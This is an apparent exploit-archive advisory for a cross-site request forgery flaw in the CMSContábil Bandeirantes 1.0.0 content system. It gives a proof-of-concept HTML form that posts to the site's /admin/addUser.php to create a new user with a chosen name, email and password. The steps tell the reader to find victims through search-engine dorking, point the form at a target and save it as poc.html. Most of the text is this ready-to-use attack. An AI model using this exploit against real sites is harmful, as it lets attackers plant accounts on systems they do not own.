CMS Contabil Bandeirantes 1.0.0 Cross Site Request Forgery

======================================================================================================================================
| # Title : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |
| # Vendor : https://scriptmafia.org/ |
======================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine .

[+] Go to the line 12.

[+] Set the target site link Save changes and apply .

[+] infected file : /admin/addUser.php

[+] Save code as poc.html

<section id=”main” class=”column” style=”height: 680px;”>

<h4 class=”alert_info”>Necessário preencher todos os campos.</h4>
<!–<h4 class=”alert_warning”>A Warning Alert</h4>

<h4 class=”alert_error”>An Error Message</h4>

<h4 class=”alert_success”>A Success Message</h4>–>

<article class=”module width_full”>
<form action=”http://127.0.0.1/cbandeirantescombr/admin/addUser.php” method=”post” enctype=”multipart/form-data” name=”cadastroUser”>
<header><h3>Adicionar Usuários</h3></header>

<div class=”module_content”>
<fieldset>
<label>Nome</label>
<input name=”nome” id=”nome” value=”” type=”text”>
</fieldset>
<fieldset>
<label>Email</label>
<input name=”email” id=”email” value=”” type=”text”>
</fieldset>
<fieldset>
<label>Senha</label>
<input name=”senha” id=”senha” value=”” type=”text”>
</fieldset>
<div class=”clear”></div>
</div>
<footer>
<div class=”submit_link”>
<input id=”limpar” name=”limpar” value=”limpar” type=”submit”>
<input name=”cadastrar” value=”Cadastrar” class=”alt_btn” type=”submit”>
</div>
</footer>
</form>
</article><!– end of post new article –>

<div class=”spacer”></div>
</section>

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================